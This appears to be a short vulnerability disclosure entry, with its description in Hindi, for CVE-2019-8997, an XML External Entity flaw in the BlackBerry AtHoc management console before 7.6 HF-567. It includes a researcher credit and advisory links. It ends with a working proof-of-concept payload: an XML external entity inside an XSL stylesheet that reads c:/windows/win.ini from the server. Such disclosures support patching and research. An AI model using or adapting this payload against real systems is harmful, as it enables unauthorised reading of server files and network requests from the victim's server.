
BlackBerry AtHoc के प्रबंधन प्रणाली (कंसोल) में 7.6 HF-567 से पहले के संस्करणों में एक XML External Entity Injection (XXE) भेद्यता किसी हमलावर को किसी मौजूदा फ़ील्ड में दुर्भावनापूर्ण रूप से निर्मित XML डालकर एप्लिकेशन सर्वर से मनमानी स्थानीय फ़ाइलें पढ़ने या नेटवर्क पर अनुरोध करने की अनुमति दे सकती है।
BlackBerry AtHoc के प्रबंधन प्रणाली (कंसोल) में 7.6 HF-567 से पहले के संस्करणों में पाई जाने वाली XML बाह्य इकाई इंजेक्शन (XXE) भेद्यता, किसी हमलावर को किसी मौजूदा फ़ील्ड में दुर्भावनापूर्ण रूप से निर्मित XML दर्ज करके एप्लिकेशन सर्वर से मनमानी स्थानीय फ़ाइलों को पढ़ने या नेटवर्क पर अनुरोध करने की अनुमति दे सकती है।
Nolan B. Kennedy (nxkennedy)
http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997
https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/
<!DOCTYPE doc [
<!ELEMENT doc ANY >
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">
<doc>&foo;</doc>
<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>